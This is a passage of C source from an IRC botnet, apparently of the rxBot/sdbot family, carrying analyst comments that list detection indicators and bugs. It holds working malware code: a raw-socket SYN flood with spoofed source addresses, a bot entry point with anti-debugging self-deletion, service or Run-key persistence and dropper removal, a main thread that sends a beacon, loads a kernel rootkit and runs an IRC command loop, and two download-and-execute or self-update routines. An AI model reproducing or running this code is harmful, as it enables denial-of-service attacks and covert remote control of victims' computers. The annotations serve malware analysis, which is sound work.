		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
 
		// IP checksum over the assembled IP+TCP headers, then re-copy the IP header
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
		if (rect==SOCKET_ERROR) {
			sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
			addlog(buf);

			fclosesocket(sock);
			fWSACleanup();
			return 0;
		}
     
		total += rect;
		QueryPerformanceCounter(&cur);
		if (cur.QuadPart >= halt_time.QuadPart)
			break;
	}

	fclosesocket(sock); 
	fWSACleanup(); 
 
	return (total);
}
/*
 * Raw-socket SYN flood (attack tooling -- documented for analysis only, not
 * improved).  Structurally a copy of SendDDOS with the flag fixed to SYN
 * (flags=2): hand-built IP+TCP headers via IP_HDRINCL, source address
 * spoofed by incrementing SpoofingIP per packet, source port random in
 * 1000..2000, runs for `len` seconds against TargetIP:TargetPort.
 *
 * Returns: total bytes handed to sendto, 0 (FALSE) on setup or send error.
 *
 * Review notes (code intentionally left unchanged):
 *  - Duplicates SendDDOS almost line for line; the only material
 *    differences are the zeroed SOCKADDR_IN and the constant SYN flag.
 *  - tcpHeader.seq is fhtons() of a 16-bit truncation (upper half lost).
 *  - IPHEADER/TCPHEADER/PSDHEADER and checksum() come from project headers
 *    not shown here.
 *  - Raw sockets with IP_HDRINCL need administrative rights and newer
 *    Windows versions reject TCP over raw sockets; on such hosts the first
 *    sendto presumably fails -- verify per OS.
 */
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{ 
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 
 
	LARGE_INTEGER freq, halt_time, cur;
	char szSendBuf[60]={0},buf[64]; 
	int rect;

	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
		return FALSE; 
 
	// raw socket; IP header supplied by us (IP_HDRINCL)
	SOCKET sock; 
	if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
		fWSACleanup();
		return FALSE; 
	}

	BOOL flag=TRUE;
	if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
		fclosesocket(sock);
		fWSACleanup();
		return FALSE; 
	}

	SOCKADDR_IN ssin; 
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family=AF_INET;
	ssin.sin_port=fhtons(TargetPort);
	ssin.sin_addr.s_addr=TargetIP;

	// fixed IP header: v4, IHL from struct size, TTL 128, proto TCP
	ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
	ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
	ipHeader.ident=1;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_TCP;
	ipHeader.checksum=0;
	ipHeader.destIP=TargetIP;

	// fixed TCP fields; flags=2 is SYN; sport/seq set per packet below
	tcpHeader.dport=fhtons(TargetPort);
	tcpHeader.ack_seq=0;
	tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
	tcpHeader.flags=2; 
	tcpHeader.window=fhtons(16384); 
	tcpHeader.urg_ptr=0; 

	// run for `len` seconds of wall clock
	long total = 0;
	QueryPerformanceFrequency(&freq);
	QueryPerformanceCounter(&cur);
	halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
 
	while (1) {
		tcpHeader.checksum=0; 
		tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
		tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));	// 16-bit truncated

		// spoofed, incrementing source address
		ipHeader.sourceIP=fhtonl(SpoofingIP++); 

		// TCP checksum over pseudo-header + TCP header
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons(sizeof(tcpHeader));
		psdHeader.saddr=ipHeader.sourceIP; 
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
		
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
 
		// IP checksum over IP+TCP, then re-copy the finished IP header
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
		if (rect==SOCKET_ERROR) {
			sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
			addlog(buf);

			fclosesocket(sock);
			fWSACleanup();
			return 0;
		}
     
		total += rect;
		QueryPerformanceCounter(&cur);
		if (cur.QuadPart >= halt_time.QuadPart)
			break;
	}

	fclosesocket(sock); 
	fWSACleanup(); 
 
	return (total);
}
/*
 * Bot entry point (second variant).  The `#endif` under the signature closes
 * a conditional that starts before this excerpt -- presumably the
 * main()/WinMain() selector; not visible.
 *
 * Flow: LoadDLLs() -> anti-analysis check IsBugged(): on detection the bot
 * deletes itself (EraseMe) and exits -> decryptstrings() de-obfuscates the
 * embedded auth / version / server string tables -> suppress the GPF dialog
 * -> copy self to %movepath%\filename (MoveBot) -> record the original path
 * under `meltkey` (so the running copy can delete the dropper later) ->
 * install as a service or write a Run key and relaunch the copy -> run the
 * service dispatcher or BotThread.
 *
 * Indicators for detection/IR: registry writes to meltkey.* and runkey.*
 * (values defined elsewhere), a copy of the binary at <movepath>\<filename>,
 * a hidden DETACHED_PROCESS child launched from that path.
 *
 * Review notes (code intentionally left unchanged):
 *  - MoveBot's success is the only gate on the install path; a failed
 *    CreateProcess of the copy ends with ExitProcess(1) and leaves the
 *    Run-key / melt-key entries in place.
 *  - `cfilename` (original path) is only used to fill the melt key.
 */
int main(int argc, char *argv[])
#endif
{
	LoadDLLs();

#ifndef NO_DDETECT
	// debugger / sandbox detection (IsBugged defined elsewhere):
	// wipe ourselves and exit
	if(IsBugged())
	{
		EraseMe(TRUE);
		ExitProcess(1);
	}
#endif

#ifndef NO_CRYPT
	// decrypt the obfuscated string tables in place
	decryptstrings(authsize, versionsize, serversize);
#endif

#ifndef NO_SERVICE
	SERVICE_TABLE_ENTRY servicetable[] =
	{
		{servicename, (LPSERVICE_MAIN_FUNCTION) ServiceMain},
		{NULL, NULL}
	};
#endif

	//TODO: Error handler here

#ifndef _DEBUG
	// no crash dialog that a user could notice
	fSetErrorMode(SEM_NOGPFAULTERRORBOX);
#endif

	// cfilename = current path; svcpath = install location <movepath>\filename
	char cfilename[MAX_PATH];
	char movetopath[MAX_PATH];
	char svcpath[MAX_PATH];
	GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
	ExpandEnvironmentStrings(movepath,movetopath,sizeof(movetopath));
	sprintf(svcpath,"%s\\%s",movetopath,filename);
	
#ifndef _DEBUG
	if (MoveBot(movetopath,filename))
	{
#ifndef NO_MELT
		// remember the dropper's path so the installed copy can delete it
		RegWrite(meltkey.hkey,meltkey.subkey,meltkey.name,cfilename);
#endif // NO_MELT


#ifndef NO_SERVICE
		InstallService(svcpath);
#else
		// Run-key persistence, then hand over to the installed copy
		RegWrite(runkey.hkey,runkey.subkey,runkey.name,svcpath);

		PROCESS_INFORMATION pinfo;
		STARTUPINFO sinfo;
		ZeroMemory(&pinfo,sizeof(pinfo));
		ZeroMemory(&sinfo,sizeof(sinfo));
		sinfo.lpTitle     = "";
		sinfo.cb = sizeof(sinfo);
		sinfo.dwFlags = STARTF_USESHOWWINDOW;
#ifdef _DEBUG
		sinfo.wShowWindow = SW_SHOW;
#else
		sinfo.wShowWindow = SW_HIDE;
#endif // _DEBUG
		if (CreateProcess(svcpath,NULL,NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,NULL,movetopath,&sinfo,&pinfo))
		{
			Sleep(200);
			CloseHandle(pinfo.hProcess);
			CloseHandle(pinfo.hThread);
			fWSACleanup();
			ExitProcess(EXIT_SUCCESS);
		}
#endif // NO_SERVICE
		ExitProcess(1);
	}
#endif // _DEBUG
#ifndef NO_SERVICE
	// already installed: run under the SCM, or register if not started as a service
	if(fStartServiceCtrlDispatcher(servicetable) == 0)
		InstallService(svcpath);
#else
	DWORD id;
	HANDLE threadhandle;
	if((threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)BotThread, NULL, 0, &id)) == 0)
		return 0;
	WaitForSingleObject(threadhandle, INFINITE);
	CloseHandle(threadhandle);
#endif // NO_SERVICE
#ifdef _DEBUG
//	CloseLog();
#endif
	return 0;
}
/*
 * Main bot thread (second variant).  `param` is unused.
 *
 * Flow: named-mutex creation -> "melt": delete the original dropper whose
 * path was stored under meltkey, then remove the key -> seed rand, pick a
 * random entry of versionlist (presumably the fake CTCP VERSION reply) ->
 * WSAStartup -> one-shot HTTP GET of `cononstart` (a first-connect beacon;
 * the response is read and discarded) -> record install time -> start the
 * uptime-recording and "secure" threads -> load the kernel rootkit
 * (InitRK/HideMe; the author's comment says "fu") -> raise the system-wide
 * WaitToKillServiceTimeout -> look up our own IP -> IRC reconnect loop over
 * servers[].
 *
 * Indicators for detection/IR:
 *  - HKLM\SYSTEM\CurrentControlSet\Control\WaitToKillServiceTimeout set
 *    to "7000" (a global change visible to every service).
 *  - an outbound HTTP request to `cononstart` right after start-up.
 *  - deletion of the dropper file recorded under meltkey.
 *  - driver load via InitRK() in non-debug builds (details not shown).
 *
 * Review notes (code intentionally left unchanged):
 *  - When fInternetOpenUrl fails, both handles are closed but execution
 *    falls through to fInternetReadFile(openurl=NULL) and closes the
 *    handles a second time (double close of httpopen).
 *  - fgethostbyname() may return NULL and is dereferenced unchecked;
 *    strncpy(inip,...) does not guarantee NUL termination.
 *  - The mutex loop only retries on a NULL handle; ERROR_ALREADY_EXISTS is
 *    never checked and the single-instance wait is commented out.
 *  - `secure` is a stack local whose address is given to SecureThread; it
 *    stays valid only because this thread never returns.
 *  - `i` is reused as a thread-slot index for both worker threads.
 */
DWORD WINAPI BotThread(LPVOID param)
{
	// retry mutex creation on failure (NULL), 5 s apart, at most 6 times
	for (int m=0;m<6;m++)
	{
		if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
			Sleep(5000);
		else
			break;
	}
//	if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
//		ExitProcess(0);

	addthread(MAIN_THREAD,str_main_thread,main_title);

#ifndef _DEBUG
#ifndef NO_MELT
		// delete the original dropper (path stored by main() under meltkey),
		// up to three attempts 2 s apart, then drop the registry value
		char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
		if (melt)
		{
			SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
			int tries=0;
			while (FileExists(melt) && tries<3)
			{
				DeleteFile(melt);
				tries++;
				Sleep(2000);
			}
			RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
		}
#endif // NO_MELT
#endif // _DEBUG

	srand(GetTickCount());
	dwstarted=GetTickCount();
#ifndef NO_VERSION_REPLY
	// choose one of versionlist[] at random for this run
	curversion=rand()%(versionsize);
#ifdef _DEBUG
	printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif

	WSADATA wsadata;
	if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
		ExitProcess(-2);

#ifndef _DEBUG
#ifndef NO_FCONNECT
	// first-connect beacon: GET `cononstart`, response discarded
	char readbuf[1024];
	HINTERNET httpopen, openurl;
	DWORD read;
	httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
	openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
	if (!openurl)
	{
		// NOTE: no early exit -- falls through to the read/close below
		fInternetCloseHandle(httpopen);
		fInternetCloseHandle(openurl);
	}
	fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
	fInternetCloseHandle(httpopen);
	fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG

#ifndef NO_INSTALLED_TIME
	if (!noadvapi32)
		GetInstalledTime();
	else
		sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
	
	int i=0;
	DWORD id=0;

#ifndef NO_RECORD_UPTIME
	i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
	threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
	

#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
	// looping "secure" thread; `secure` lives on this (never-returning) stack
	NTHREAD secure;		
	secure.bdata2=TRUE;//loop
	i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
	threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
	
#ifndef NO_RDRIV
#ifndef _DEBUG
	// kernel-mode hiding; InitRK/HideMe are not in this excerpt
	rkenabled=InitRK();//initialize fu
	if (rkenabled)
		HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV

#ifndef _DEBUG // maybe this will give the shutdown handler time to work
	// system-wide setting: every service gets 7 s at shutdown
	RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
	
	//get internal ip
	char *ip;
	char hostname[256];
	struct hostent *h;
	fgethostname(hostname, 256);
	h = fgethostbyname(hostname);	// NULL on failure -- unchecked
	ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
	strncpy(inip,ip,sizeof(inip));


	curserver=0;
	HookProtocol(&mainirc);
	
	// C2 loop: rotate through servers[] until told to stop
	while (mainirc.should_connect()) {
		if (!mainirc.is_connected())
		{
#ifdef _DEBUG
			printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
			FlushDNSCache();
#endif
			mainirc.start(servers[curserver].host,servers[curserver].port,
					  mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
					  mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
			mainirc.message_loop();
		}
		else
			mainirc.message_loop();

		Sleep(SFLOOD_DELAY);
		
		// next server, wrapping at serversize
		if (curserver==(serversize-1))
			curserver=0;
		else
			curserver++;
	}

	// cleanup;
	killthreadall();
	fWSACleanup();
	ReleaseMutex(mutex);
	ExitThread(0);
}
/*
 * Download-and-execute / self-update thread (NTHREAD variant).  Request
 * fields: data1 = URL, data2 = destination path, bdata1 = update?,
 * bdata2 = run after download?, bdata3 = hide window?, verbose = wait for
 * the child and report its runtime, idata1 = uninstall flag passed on.
 * The struct is copied locally and `gotinfo` set so the caller can reuse it.
 *
 * Security notes for the analyst: this variant performs NO integrity check
 * at all (no size, no CRC) before executing or replacing itself with the
 * downloaded file; whoever controls the channel runs arbitrary code.
 *
 * Review notes (code intentionally left unchanged):
 *  - strncpy into dlfrom/dlto does not guarantee NUL termination.
 *  - `f < (HANDLE)1` does not catch INVALID_HANDLE_VALUE ((HANDLE)-1), so a
 *    failed CreateFile is not detected.
 *  - fInternetReadFile's return is ignored; `r` is uninitialized on the
 *    first pass if that call fails.
 *  - fileTotBuff (500 KB) is malloc'ed unchecked, filled and freed without
 *    ever being read -- dead work and a NULL-deref if malloc fails.
 *  - The two `return 1` paths (path parse / CreateProcess failure) skip
 *    clearthread(dl.threadnum); every other exit path calls it, so the
 *    thread slot stays marked in use.
 *  - In the verbose branch `start` and `total` shadow the outer variables.
 *  - `wait` is assigned but unused (dl.verbose is read directly).
 *  - `return 0` after ExitThread is unreachable.
 */
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	NTHREAD dl = *((NTHREAD *)param);
	NTHREAD *dls = (NTHREAD *)param;
	dls->gotinfo = TRUE;
	IRC* irc=(IRC*)dl.conn;

	// URL and destination path; unterminated if the inputs fill the buffers
	char dlfrom[MAX_HOSTNAME];
	char dlto[MAX_PATH];
	strncpy(dlfrom,dl.data1,sizeof(dlfrom));
	strncpy(dlto,dl.data2,sizeof(dlto));

	HANDLE fh = fInternetOpenUrl(ih, dlfrom, NULL, 0, 0, 0);
	if (fh != NULL)
	{
		HANDLE f = CreateFile(dlto, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// NOTE: INVALID_HANDLE_VALUE is (HANDLE)-1 and is not < 1
		if (f < (HANDLE)1)
		{
			if (!dl.silent)
				irc->pmsg(dl.target,"%s Couldn't open file for writing: %s.",(dl.bdata1?update_title:download_title),dlto);

			fInternetCloseHandle(fh);
			clearthread(dl.threadnum);
			ExitThread(0);
		}

		total = 0;
		start = GetTickCount();
		char *fileTotBuff=(char *)malloc(512000);	// never read; see header
		do
		{
			ZeroMemory(buffer,sizeof(buffer));
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);	// return ignored
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000)
			{
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
		}
		while (r > 0);

		speed = total / (((GetTickCount() - start) / 1000) + 1);
		free(fileTotBuff);
		CloseHandle(f);
		fInternetCloseHandle(fh);

		if (!dl.silent)
			irc->pmsg(dl.target,"%s File download: %.1fKB to: %s @ %.1fKB/sec.",(dl.bdata1?update_title:download_title), total/1024.0, dlto, speed/1024.0);

		// plain download with "run" requested: execute it from its own directory
		if (!dl.bdata1 && dl.bdata2)
		{
			STARTUPINFO si;
			PROCESS_INFORMATION pi;
			BOOL hide=dl.bdata3, wait=dl.verbose;	// `wait` unused
			char path[MAX_PATH];
			strncpy(path,dlto,sizeof(path));
			if (!fPathRemoveFileSpec(path))
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Couldn't parse path, error: <%d>", download_title, GetLastError());
				return 1;	// skips clearthread()
			}
			ZeroMemory(&si,sizeof(si));
			ZeroMemory(&pi,sizeof(pi));
			si.cb=sizeof(si);
			si.dwFlags = STARTF_USESHOWWINDOW;
			si.wShowWindow = (hide?SW_HIDE:SW_SHOW);

			if (!CreateProcess(NULL,dlto,NULL,NULL,FALSE,0,NULL,path,&si,&pi))
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Failed to create process: \"%s\", error: <%d>", download_title, dlto, GetLastError());
				return 1;	// skips clearthread()
			}
			else
			{
				DWORD start=GetTickCount();	// shadows outer `start`
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Created process: \"%s\", PID: <%d>",download_title,dlto,pi.dwProcessId);
				
				// verbose: block until the child exits and report its runtime
				if (dl.verbose)
				{	
					WaitForSingleObject(pi.hProcess,INFINITE);
					DWORD stop=GetTickCount();
					char ttime[120],stime[120];
					stime[0]='\0';
					DWORD total = ((stop - start)/1000);	// shadows outer `total`
					DWORD hours = (total%86400)/3600;
					DWORD minutes = ((total%86400)%3600)/60;
					DWORD seconds = ((total%86400)%3600)%60;
					if (hours>0)
					{
						sprintf(ttime," %d%s",hours,(hours==1?" hour":" hours"));
						strcat(stime,ttime);
					}
					sprintf(ttime," %.2d:%.2d",minutes,seconds);
					strcat(stime,ttime);

					irc->pmsg(dl.target,"%s Process Finished: \"%s\", Total Running Time: %s.",download_title,dlto,stime);
				}
				if (pi.hProcess) CloseHandle(pi.hProcess);
				if (pi.hThread) CloseHandle(pi.hThread);
			}

		// download is an update
		}
		else if (dl.bdata1)
		{
			// launch the new binary hidden, uninstall ourselves, quit IRC, exit
			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			ZeroMemory(&pinfo, sizeof(PROCESS_INFORMATION));
			ZeroMemory(&sinfo, sizeof(STARTUPINFO));
			sinfo.cb = sizeof(sinfo);
			sinfo.wShowWindow = SW_HIDE;	// no STARTF_USESHOWWINDOW set, so ignored
			if (CreateProcess(NULL, dlto, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS|DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE)
			{
				uninstall(TRUE,(dl.idata1==1?TRUE:FALSE));
				irc->quit(str_quit_upd);
				Sleep(FLOOD_DELAY);
				irc->disconnect();
				fWSACleanup();
				ExitProcess(EXIT_SUCCESS);
			}
			else
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Update failed: Error executing file: %s.",update_title,dlto);
			}
		}
	}
	else
	{
		if (!dl.silent)
			irc->pmsg(dl.target,"%s Bad URL or DNS Error, error: <%d>",(dl.bdata1?update_title:download_title),GetLastError());
	}
	clearthread(dl.threadnum);
	ExitThread(0);

		return 0;
}
/*
 * Download-and-execute / self-update thread (DOWNLOAD variant using the
 * CreateProc helper).  Same flow as the other DOWNLOAD-based variant in this
 * listing: fInternetOpenUrl(dl.url) -> CreateFile(dl.dest) -> stream the
 * body in IRCLINE chunks (optionally XOR-decoded by Xorbuff) -> optional
 * size check (dl.filelen) and CRC32 check (crc32f over the written file) ->
 * run via CreateProc (dl.run) or, for an update, CreateProc hidden,
 * uninstall() and ExitProcess.
 *
 * Security notes for the analyst: size + CRC32 are integrity hints, not
 * authentication -- both values come over the same command channel as the
 * URL, so a channel compromise means arbitrary code execution.  Xorbuff is
 * obfuscation, not confidentiality.
 *
 * Review notes (code intentionally left unchanged):
 *  - `f < (HANDLE)1` does not catch INVALID_HANDLE_VALUE ((HANDLE)-1); a
 *    failed CreateFile goes unnoticed and WriteFile is called on it.
 *  - On the "couldn't open file" path `fh` is never closed (handle leak).
 *  - fInternetReadFile's return is ignored; `r` is stale/uninitialized if
 *    it fails.
 *  - malloc(512000) is unchecked and fileTotBuff is never read (the code
 *    that used it is commented out).
 *  - sprintf into threads[].name with dl.url: the field size is not
 *    visible here, so this may overflow on long URLs -- verify.
 *  - A file failing the size/CRC check is left on disk.
 */
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	// copy the request and release the caller's struct
	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = true;

	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		// (NOTE: INVALID_HANDLE_VALUE is (HANDLE)-1, which is not < 1)
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			// fh is leaked on this path
			ExitThread(EXIT_FAILURE);
		}

		total = 0;
		start = GetTickCount();

		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			// return value unchecked; r is stale if this fails
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			if (dl.encrypted)
				Xorbuff(buffer,r);	// XOR de-obfuscation of the payload
			WriteFile(f, buffer, r, &d, NULL);
			
			// keep the first 500 KB in memory (unused -- see CRC block below)
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			// progress is exposed through the thread-list name
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: File download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		bool goodfile=true;

		// optional exact-size check supplied with the command
		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=false;
				sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=false;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		// CRC32 over the file on disk -- an integrity hint, not authentication
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=false;
				sprintf(buffer,"[DOWNLOAD]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		// a bad file is left on disk; only the execute step is skipped
		if (goodfile==false) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// dl.run: launch the downloaded file (CreateProc defined elsewhere)
			if (dl.run == 1) {
				CreateProc(dl.dest,NULL,SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DOWNLOAD]: Opened: %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// start the new binary hidden, then remove ourselves and exit
			if (CreateProc(dl.dest,NULL,SW_HIDE) != 0) {
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DOWNLOAD]: Update failed: Error executing file: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DOWNLOAD]: Bad URL, or DNS Error: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

badfile:
	// reached with fh == NULL on the "bad URL" path; the close is a no-op then
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(EXIT_SUCCESS);
}